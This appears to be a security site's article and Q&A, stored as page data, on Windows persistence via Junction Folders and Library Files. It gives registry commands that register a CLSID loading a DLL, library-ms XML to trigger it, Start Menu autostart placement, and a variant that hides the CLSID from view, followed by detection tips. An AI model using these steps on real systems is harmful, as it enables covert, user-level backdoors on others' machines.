[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqprSV8NgAYjIIy4R_GwEhsxlm91_1fQlBHmvU2JvX5Y":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},35,"How can the Library Files backdoor be made more stealthy to avoid detection?","By default, the `Includes` section in the library-ms XML reveals the malicious CLSID. Attackers can clear the display path and set `isDefaultSaveLocation` to `false`, hiding the CLSID entirely. The manipulated library then appears normal while still loading the DLL when opened. This advanced technique is covered in the article under \"Further Exploitation of Library Files Backdoor\" and makes detection harder because the CLSID is not visibly listed in the library's properties or Explorer view.","\u003Cp>By default, the `Includes` section in the library-ms XML reveals the malicious CLSID. Attackers can clear the display path and set `isDefaultSaveLocation` to `false`, hiding the CLSID entirely. The manipulated library then appears normal while still loading the DLL when opened. This advanced technique is covered in the article under &quot;Further Exploitation of Library Files Backdoor&quot; and makes detection harder because the CLSID is not visibly listed in the library&#39;s properties or Explorer view.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-the-library-files-backdoor-be-made-more-stealthy-to-avoid-detection-1777485433888","stealth, Library Files, CLSID, hiding, detection bypass, library-ms",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":20,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},10,"Penetration Techniques - Backdoor Exploitation of Junction Folders and Library Files","penetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files","Explore backdoor exploitation using Windows Junction Folders and Library Files, with POC, detection methods, and insights from CIA Vault 7 leaks.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The CIA Vault 7 documents released by WikiLeaks involve the exploitation of Junction Folders and Library Files in Windows systems\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763381.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763373.html\u003C\u002Fp>\u003Cp>Jayden Zheng analyzed this, sharing a backdoor exploitation method for Library Files, and detailed how to detect malicious use of Junction Folders and Library Files\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fhunting-for-junction-folder-persistence\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fabusing-windows-library-files-for-persistence\u002F\u003C\u002Fp>\u003Cp>Based on the above references, this article will compare Junction Folders and Library Files, further exploit the backdoor method of Library Files (more covert), open-source a POC, and share insights on detection\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Methods of Utilizing Junction Folders\u003C\u002Fli>\u003Cli>Methods of Utilizing Library Files\u003C\u002Fli>\u003Cli>Further Exploitation of Library Files Backdoors\u003C\u002Fli>\u003Cli>Detection and Identification\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Methods of Utilizing Junction Folders\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Junction Folders can be simply understood as folders that can jump to another location\u003C\u002Fp>\u003Cp>Three common methods of creation:\u003C\u002Fp>\u003Cul>\u003Cli>Modifying registry entries\u003C\u002Fli>\u003Cli>Modifying desktop.ini within the folder\u003C\u002Fli>\u003Cli>Using special filenames, such as test.{ED7BA470-8E54-465E-825C-99712043E01C}\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For the third method, specific CLSIDs correspond to specific file paths\u003C\u002Fp>\u003Cp>If we create a CLSID via the registry and specify a DLL path, that DLL will be loaded when opening the folder\u003C\u002Fp>\u003Ch3>1、Practical Testing\u003C\u002Fh3>\u003Cp>Test DLL executes calculator, reference download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(1) Modify the registry and add a registry entry\u003C\u002Fh4>\u003Cp>The bat command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\InProcServer32\u003Cbr>REG.EXE ADD %KEY% \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY% \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Create a new folder test.{11111111-1111-1111-1111-111111111111}\u003C\u002Fh4>\u003Ch4>(3) Select this folder to load calc.dll\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>It will only load once; restarting the explorer.exe process can trigger it again\u003C\u002Fp>\u003Ch3>2. Implementation method for automatic system startup loading (user permissions)\u003C\u002Fh3>\u003Ch4>(1) Rename system folders\u003C\u002Fh4>\u003Cp>Rename %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories to Accessories.{11111111-1111-1111-1111-111111111111}\u003C\u002Fp>\u003Ch4>(2) Create a new folder\u003C\u002Fh4>\u003Cp>Save the folder test.{11111111-1111-1111-1111-111111111111} in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Methods for Library Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>File extension is library-ms, located at %appdata%\\Microsoft\\Windows\\Libraries\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fclient-management\u002Fwindows-libraries\u003C\u002Fp>\u003Cp>Simple understanding of Library Files:\u003C\u002Fp>\u003Cp>Can display contents from multiple folders simultaneously\u003C\u002Fp>\u003Ch3>1. Practical testing:\u003C\u002Fh3>\u003Ch4>(1) Modify the registry, add registry entries\u003C\u002Fh4>\u003Cp>Batch command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003Cbr>REG.EXE ADD %KEY%ShellFolder \u002FV Attributes \u002FT REG_DWORD \u002FD 4035969341 \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Compared to Junction Folders, Library Files require an additional registry entry to be added.\u003C\u002Fp>\u003Ch4>(2) Modify %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>Add the following content in XML format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>true\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Access %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>When opening the file, DLLs will be loaded multiple times; a mutex can be added here to prevent multiple launches. Download link (for demonstration purposes only):\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Noteworthy points:\u003C\u002Fp>\u003Cp>Includes changed from 2 locations to 3 locations\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019761917_0_5b572722a2.jpeg\">\u003C\u002Fp>\u003Cp>By examining this location, the loaded CLSID can be discovered, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019774265_1_34930c52bb.jpeg\">\u003C\u002Fp>\u003Ch3>2. Implementation method for system auto-loading at startup (user permissions)\u003C\u002Fh3>\u003Cp>Place the modified Documents.library-ms in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Music.library-ms and Pictures.library-ms can also be modified, or even custom-created (with specified display icons)\u003C\u002Fp>\u003Ch2>0x04 Further exploitation of Library Files backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation method of Library Files backdoor, the most obvious characteristic is that the loaded CLSID can be discovered directly from Includes\u003C\u002Fp>\u003Cp>Here is a solution:\u003C\u002Fp>\u003Cp>Clear the path and set it to not display\u003C\u002Fp>\u003Cp>Successfully hide the loaded CLSID, the final effect is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019786530_2_57b1955ec4.jpeg\">\u003C\u002Fp>\u003Ch3>1. Implementation method\u003C\u002Fh3>\u003Cp>According to the XML format, clear the original \u003Csearchconnectordescription> and add the following code:\u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>false\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Cissearchonlyitem>true\u003C\u002Fissearchonlyitem>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. POC implemented via PowerShell\u003C\u002Fh3>\u003Cp>After testing, it is not necessary to specify \u003Cownersid>; a fixed template can be used.\u003C\u002Fownersid>\u003C\u002Fp>\u003Cp>The process is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the registry\u003C\u002Fli>\u003Cli>Release Documents.library-ms in the specified directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Points to note in script writing:\u003C\u002Fp>\u003Col>\u003Cli>The output encoding format must be specified as UTF-8; the default UTF-16 (unicode) will cause the library-ms file format to be incorrect.\u003C\u002Fli>\u003Cli>To pass the variable $clsid into the string, double quotes \" must be used for string definition instead of single quotes '\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Complete code can be referenced from:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code implements adding registry entries and creating the file %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms, which loads c:\\test\\calc.dll when the user logs in.\u003C\u002Fp>\u003Ch2>0x05 Detection and Identification\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation methods for Junction Folders and Library Files, the special aspects are:\u003C\u002Fp>\u003Cul>\u003Cli>Ordinary user permissions are sufficient\u003C\u002Fli>\u003Cli>The file format is uncommon and highly deceptive\u003C\u002Fli>\u003C\u002Ful>\u003Cp>By combining exploitation methods, each step can be inspected:\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Payload must be in DLL format\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs under the registry CLSID\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Monitor sensitive registry locations HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID and HKEY_CURRENT_USER\\Software\\Classes\\CLSID\u003C\u002Fp>\u003Col>\u003Cli>For Junction Folders, traverse folders to check if file extensions are associated with suspicious CLSIDs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For Library Files, traverse library-ms files to check if they are associated with suspicious CLSIDs\u003C\u002Fp>\u003Cp>This can be directly referenced from Jayden Zheng's script:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fcountercept\u002F6890be67e09ba3daed38fa7aa6298fdf\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tested exploitation methods for Junction Folders and Library Files, further explored backdoor exploitation methods for Library Files to enhance stealth, open-sourced a POC, discussed considerations for script writing, and finally shared insights on detection\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The CIA Vault 7 documents released by WikiLeaks involve the exploitation of Junction Folders and Library Files in Windows systems\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763381.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763373.html\u003C\u002Fp>\u003Cp>Jayden Zheng analyzed this, sharing a backdoor exploitation method for Library Files, and detailed how to detect malicious use of Junction Folders and Library Files\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fhunting-for-junction-folder-persistence\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fabusing-windows-library-files-for-persistence\u002F\u003C\u002Fp>\u003Cp>Based on the above references, this article will compare Junction Folders and Library Files, further exploit the backdoor method of Library Files (more covert), open-source a POC, and share insights on detection\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Methods of Utilizing Junction Folders\u003C\u002Fli>\u003Cli>Methods of Utilizing Library Files\u003C\u002Fli>\u003Cli>Further Exploitation of Library Files Backdoors\u003C\u002Fli>\u003Cli>Detection and Identification\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Methods of Utilizing Junction Folders\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Junction Folders can be simply understood as folders that can jump to another location\u003C\u002Fp>\u003Cp>Three common methods of creation:\u003C\u002Fp>\u003Cul>\u003Cli>Modifying registry entries\u003C\u002Fli>\u003Cli>Modifying desktop.ini within the folder\u003C\u002Fli>\u003Cli>Using special filenames, such as test.{ED7BA470-8E54-465E-825C-99712043E01C}\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For the third method, specific CLSIDs correspond to specific file paths\u003C\u002Fp>\u003Cp>If we create a CLSID via the registry and specify a DLL path, that DLL will be loaded when opening the folder\u003C\u002Fp>\u003Ch3>1、Practical Testing\u003C\u002Fh3>\u003Cp>Test DLL executes calculator, reference download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(1) Modify the registry and add a registry entry\u003C\u002Fh4>\u003Cp>The bat command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\InProcServer32\u003Cbr>REG.EXE ADD %KEY% \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY% \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Create a new folder test.{11111111-1111-1111-1111-111111111111}\u003C\u002Fh4>\u003Ch4>(3) Select this folder to load calc.dll\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>It will only load once; restarting the explorer.exe process can trigger it again\u003C\u002Fp>\u003Ch3>2. Implementation method for automatic system startup loading (user permissions)\u003C\u002Fh3>\u003Ch4>(1) Rename system folders\u003C\u002Fh4>\u003Cp>Rename %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories to Accessories.{11111111-1111-1111-1111-111111111111}\u003C\u002Fp>\u003Ch4>(2) Create a new folder\u003C\u002Fh4>\u003Cp>Save the folder test.{11111111-1111-1111-1111-111111111111} in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Methods for Library Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>File extension is library-ms, located at %appdata%\\Microsoft\\Windows\\Libraries\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fclient-management\u002Fwindows-libraries\u003C\u002Fp>\u003Cp>Simple understanding of Library Files:\u003C\u002Fp>\u003Cp>Can display contents from multiple folders simultaneously\u003C\u002Fp>\u003Ch3>1. Practical testing:\u003C\u002Fh3>\u003Ch4>(1) Modify the registry, add registry entries\u003C\u002Fh4>\u003Cp>Batch command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003Cbr>REG.EXE ADD %KEY%ShellFolder \u002FV Attributes \u002FT REG_DWORD \u002FD 4035969341 \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Compared to Junction Folders, Library Files require an additional registry entry to be added.\u003C\u002Fp>\u003Ch4>(2) Modify %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>Add the following content in XML format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>true\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Access %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>When opening the file, DLLs will be loaded multiple times; a mutex can be added here to prevent multiple launches. Download link (for demonstration purposes only):\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Noteworthy points:\u003C\u002Fp>\u003Cp>Includes changed from 2 locations to 3 locations\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019761917_0_5b572722a2-1.jpeg\">\u003C\u002Fp>\u003Cp>By examining this location, the loaded CLSID can be discovered, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019774265_1_34930c52bb-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Implementation method for system auto-loading at startup (user permissions)\u003C\u002Fh3>\u003Cp>Place the modified Documents.library-ms in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Music.library-ms and Pictures.library-ms can also be modified, or even custom-created (with specified display icons)\u003C\u002Fp>\u003Ch2>0x04 Further exploitation of Library Files backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation method of Library Files backdoor, the most obvious characteristic is that the loaded CLSID can be discovered directly from Includes\u003C\u002Fp>\u003Cp>Here is a solution:\u003C\u002Fp>\u003Cp>Clear the path and set it to not display\u003C\u002Fp>\u003Cp>Successfully hide the loaded CLSID, the final effect is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019786530_2_57b1955ec4-1.jpeg\">\u003C\u002Fp>\u003Ch3>1. Implementation method\u003C\u002Fh3>\u003Cp>According to the XML format, clear the original \u003Csearchconnectordescription> and add the following code:\u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>false\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Cissearchonlyitem>true\u003C\u002Fissearchonlyitem>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. POC implemented via PowerShell\u003C\u002Fh3>\u003Cp>After testing, it is not necessary to specify \u003Cownersid>; a fixed template can be used.\u003C\u002Fownersid>\u003C\u002Fp>\u003Cp>The process is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the registry\u003C\u002Fli>\u003Cli>Release Documents.library-ms in the specified directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Points to note in script writing:\u003C\u002Fp>\u003Col>\u003Cli>The output encoding format must be specified as UTF-8; the default UTF-16 (unicode) will cause the library-ms file format to be incorrect.\u003C\u002Fli>\u003Cli>To pass the variable $clsid into the string, double quotes \" must be used for string definition instead of single quotes '\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Complete code can be referenced from:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code implements adding registry entries and creating the file %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms, which loads c:\\test\\calc.dll when the user logs in.\u003C\u002Fp>\u003Ch2>0x05 Detection and Identification\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation methods for Junction Folders and Library Files, the special aspects are:\u003C\u002Fp>\u003Cul>\u003Cli>Ordinary user permissions are sufficient\u003C\u002Fli>\u003Cli>The file format is uncommon and highly deceptive\u003C\u002Fli>\u003C\u002Ful>\u003Cp>By combining exploitation methods, each step can be inspected:\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Payload must be in DLL format\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs under the registry CLSID\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Monitor sensitive registry locations HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID and HKEY_CURRENT_USER\\Software\\Classes\\CLSID\u003C\u002Fp>\u003Col>\u003Cli>For Junction Folders, traverse folders to check if file extensions are associated with suspicious CLSIDs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For Library Files, traverse library-ms files to check if they are associated with suspicious CLSIDs\u003C\u002Fp>\u003Cp>This can be directly referenced from Jayden Zheng's script:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fcountercept\u002F6890be67e09ba3daed38fa7aa6298fdf\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tested exploitation methods for Junction Folders and Library Files, further explored backdoor exploitation methods for Library Files to enhance stealth, open-sourced a POC, discussed considerations for script writing, and finally shared insights on detection\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1772,"Onedaysec",4,"published","2026-02-02T08:20:29.495Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Windows Backdoor Exploitation: Junction Folders & Library Files","Windows backdoor, junction folders, library files, persistence, CIA Vault 7, registry exploitation, DLL loading, detection techniques",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],36,34,33,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.864Z","2026-07-23T16:00:54.459Z","draft","2026-07-23T16:03:04.523Z"]